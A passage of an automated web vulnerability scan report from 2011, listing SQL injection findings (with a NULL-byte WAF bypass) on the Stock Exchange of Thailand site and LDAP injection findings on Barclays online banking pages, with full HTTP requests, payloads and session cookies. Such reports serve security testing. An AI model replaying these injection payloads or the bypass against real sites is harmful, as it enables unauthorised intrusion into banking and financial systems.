Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.1.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=landing%3Egoogle%3Epackettrapit%3Ewireless; s_nr=1304447524201-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253Dlanding%25253Egoogle%25253Epackettrapit%25253Ewireless%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%2526ot%253DA

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 13:45:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3026

<html>
<head>
<title>Runtime Error</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
   p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.1.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=landing%3Egoogle%3Epackettrapit%3Ewireless; s_nr=1304447524201-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253Dlanding%25253Egoogle%25253Epackettrapit%25253Ewireless%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:45:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: EntryPointCheck=5/3/2011 9:45:07 AM; domain=scriptlogic.com; expires=Fri, 03-Jun-2011 13:45:07 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1"
...[SNIP]...

1.15. http://www.set.or.th/set/images/bg-body.gif [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /set/images/bg-body.gif

Issue detail

The jsessionid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the jsessionid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /set/images/bg-body.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51%00' HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:59:22 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 09:21:14 GMT
ETag: "cd18c-33cf-49161680"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /set/images/bg-body.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51%00'' HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:59:24 GMT
Server: Apache
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /set/images/bg-body.gif;jsessionid=A22EEA66F59FADF41D
...[SNIP]...

2. LDAP injection  previous  next
There are 4 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do [WLBC cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/IndividualSavingsAcctOverview.do

Issue detail

The WLBC cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the WLBC cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /olb/w/IndividualSavingsAcctOverview.do?action=displayIndividualSavingsAcctOverview&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=*)(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:28:38 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06:r3ap-RolbClusterB-server08; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:28:37 GMT; Path=/
Connection: close
Set-Cookie: WLBC=623582380.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />
...[SNIP]...

Request 2

GET /olb/w/IndividualSavingsAcctOverview.do?action=displayIndividualSavingsAcctOverview&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=*)!(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:28:39 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:28:38 GMT; Path=/
Connection: close
Set-Cookie: WLBC=640359596.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<m
...[SNIP]...

2.2. https://ibank.barclays.co.uk/olb/w/LoanOverview.do [WLBC cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/LoanOverview.do

Issue detail

The WLBC cookie appears to be vulnerable to LDAP injection attacks.

The payloads fdddf2e8fa34970c)(sn=* and fdddf2e8fa34970c)!(sn=* were each submitted in the WLBC cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /olb/w/LoanOverview.do?action=loanOverview||Barclayloan&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=fdddf2e8fa34970c)(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:26:17 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06:r3ap-RolbClusterB-server02; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:26:16 GMT; Path=/
Connection: close
Set-Cookie: WLBC=623582380.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />
...[SNIP]...

Request 2

GET /olb/w/LoanOverview.do?action=loanOverview||Barclayloan&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=fdddf2e8fa34970c)!(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:26:18 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:26:17 GMT; Path=/
Connection: close
Set-Cookie: WLBC=640359596.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<m
...[SNIP]...

2.3. https://ibank.barclays.co.uk/olb/w/ReorderPasscodeStandalone.do [WLBC cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/ReorderPasscodeStandalone.do

Issue detail

The WLBC cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the WLBC cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /olb/w/ReorderPasscodeStandalone.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=*)(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:56:32 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06:r3ap-RolbClusterB-server010; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:56:31 GMT; Path=/
Connection: close
Set-Cookie: WLBC=623582380.32800.0000; path=/
Content-Length: 16046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Forgotten login details
Step 1 of 3

    </title>



















<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<meta name="DCSext.logonreport" content="FCR_FLD_LKD" />
<
...[SNIP]...

Request 2

GET /olb/w/ReorderPasscodeStandalone.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=*)!(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:56:33 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:56:32 GMT; Path=/
Connection: close
Set-Cookie: WLBC=640359596.32800.0000; path=/
Content-Length: 16047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Forgotten login details
Step 1 of 3

    </title>



















<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<meta name="DCSext.logonreport" content="FCR_FLD_LKD" />
<meta name="DCSext.TFA" content="false" />
<meta name="WT.cg_s" content="reorder - Forgotten login details" />
<meta name="D
...[SNIP]...

2.4. https://ibank.barclays.co.uk/olb/w/ViewEStatementHistoryStep1.do [WLBC cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/ViewEStatementHistoryStep1.do

Issue detail

The WLBC cookie appears to be vulnerable to LDAP injection attacks.

The payloads 45ade80a6ceab382)(sn=* and 45ade80a6ceab382)!(sn=* were each submitted in the WLBC cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /olb/w/ViewEStatementHistoryStep1.do?action=ViewEStatementHistoryStep1&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=45ade80a6ceab382)(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:26:24 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06:r2ap-RolbClusterB-server05; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:26:24 GMT; Path=/
Connection: close
Set-Cookie: WLBC=606805164.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />
...[SNIP]...

Request 2

GET /olb/w/ViewEStatementHistoryStep1.do?action=ViewEStatementHistoryStep1&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=45ade80a6ceab382)!(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:26:25 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:26:24 GMT; Path=/
Connection: close
Set-Cookie: WLBC=640359596.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
